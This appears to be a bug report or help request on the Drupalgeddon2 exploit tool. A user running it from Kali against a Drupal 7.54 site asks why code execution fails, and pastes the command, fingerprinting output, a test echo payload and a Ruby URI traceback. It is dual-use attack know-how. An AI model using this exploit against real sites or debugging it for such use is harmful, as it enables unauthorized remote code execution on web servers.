Description
Hi,
#attack machine
kali 2020_03 full updated
#target
OS: Windows
webserver: IIS8.5
Drupal v7.54
https://www.local.com/CHANGELOG.txt
Tried with the 'try_phpshell = true' and 'try_phpshell = false', not running.
Any ideas I could try?
############
```
[root:/opt/Drupalgeddon2]# ruby drupalgeddon2.rb https://www.local.com/ (master)
[*] --==[::#Drupalggedon2::]==--
[i] Target : https://www.local.com/
[+] Found : https://www.local.com/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.54
[*] Testing: Form (user/password)
[+] Result : Form valid
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
[*] Testing: Code Execution (Method: name)
[i] Payload: echo EOLRQNNO
Traceback (most recent call last):
	7: from drupalgeddon2.rb:463:in `<main>'
	6: from drupalgeddon2.rb:463:in `each'
	5: from drupalgeddon2.rb:473:in `block in <main>'
	4: from drupalgeddon2.rb:44:in `http_request'
	3: from /usr/lib/ruby/2.7.0/uri/common.rb:737:in `URI'
	2: from /usr/lib/ruby/2.7.0/uri/common.rb:234:in `parse'
	1: from /usr/lib/ruby/2.7.0/uri/rfc3986_parser.rb:73:in `parse'
/usr/lib/ruby/2.7.0/uri/rfc3986_parser.rb:21:in `split': URI must be ascii only "https://www.local.com/?q=file/ajax/name/%23value/form-2sKgFeXBW8q3Ukw1XT7U6wHkN_RxDjP0zcrXhWGxt68\\" /><input type=\"hidden\" name=\"form_id\" value=\"search_block_form\" /><div style=\"clear:both\"><div class=\"block-sep\"><div id=\"navigation\" role=\"navigation\" class=\"clearfix\"><div class=\"constrain\"><div id=\"nav-left\"><div id=\"nav-right\"><ul id=\"navmenu\" class=\"sf-menu sf-js-enabled sf-shadow\">
- <a href=\"
```